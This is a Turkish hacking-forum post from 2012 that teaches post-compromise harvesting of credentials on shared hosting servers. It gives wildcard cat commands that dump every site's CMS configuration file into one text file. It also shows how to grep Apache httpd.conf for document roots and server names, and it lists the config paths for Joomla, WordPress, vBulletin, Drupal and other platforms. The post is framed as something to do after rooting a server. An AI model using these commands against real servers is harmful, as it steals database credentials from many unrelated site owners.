Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.






Config Çekme Priv8

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 15-06-2012 20:26   #1
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
05/2012
Nereden
Bruksel
Mesajlar
Konular

Teşekkür (Etti): 11
Teşekkür (Aldı): 7


Config Çekme Priv8



Evet arkadaşlar çogu kişi bir serverda root olduktan sonra configleri almıyor... Ve sonra server lazım oluyor giremiyor...
Configleri almanız sizin işinizi kolaylaştırcaktır..
Çeşitli Örnekler :
Kod:
/home/kullaniciadi/public_html/ Şeklindeyse Dizin : cat /home/*/public_html/configuration.php>>configler.txt

Kod:
/var/www/vhosts/siteismi.com/httpdocs Şeklindeyse Dizin : cat /var/www/vhosts/*/httpdocs/configuration.php>>configler.txt

Tabi bunlar basit olanlar.. Cat de permission varsa tac kullanabilirsiniz..
Tabi birde şöyle olabiliyor
Kod:
: /hermes/bosweb/web015/b157/sl.kyleand1/public_html/stonezone/bamapparel

Bu durumda arkadaşlar
Kod:
locate "httpd.conf"
deyip httpd.conf dosyamızı aratıyoruz..
Genelde
Kod:
"/usr/local/apache/conf/httpd.conf
" burda olur..
Kod:
cat /usr/local/apache/conf/httpd.conf |grep ********Root

İle Klasorlerin hepsini görebilirsiniz..
Kod:
cat /usr/local/apache/conf/httpd.conf |grep ********Root>>klasorler.txt

klasorler.txt ye kaydedip düzenlersiniz..
Kod:
Örnek İlk Hali : ********Root /hermes/bosweb/web015/b157/sl.kyleand1/z/s/public_html
Örnek Son Hali : cat hermes/bosweb/web015/b157/sl.kyleand1/z/s/public_html/configuration.php>>config.txt

şeklinde yapabilirsiniz..
Excel İle yapabilirsiniz.. yada size kalmış dft009
Birde şu Kodumuz var
Kod:
cat /usr/local/apache/conf/httpd.conf |grep ServerName

Bu kodlada Serverdaki Siteleri Bulursunuz..
Freebsdlerde httpd.conf yerine
Kod:
"hosting.conf"
olabilir..
Tabi burdaki configuration.php size kalmış Joomla’ların ayar dosyasını size kaydeder.. Siz bunu vbulletin smf vb.. olarak yapabilirsiniz..
Örnek Script Config Yolları :
php nuke -> . /config.php
vbulettin->. /includes/config.php
mybb -> . /inc/config.php
phpbb -> . /config.php
smf -> Settings.php
joomla -> configuration.php , configuration.php-dist
wordpress -> wp-config.php
seditio -> datas/config.php
drupal sistem:/home/user/public_html/sites/default/settings.php
setidio:/home/site/public_html/datas/config.php
vbulletin: /home/site/public_html/includes/config.php
vbulletin: /home/site/public_html/includes/class_core.php
Tabi bu işlemleri Root olmanıza gerek yok .. Geçişler varsada yapabilirsiniz..
uid = 43(apache) vb..
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli
instagram takipci hilesi

wau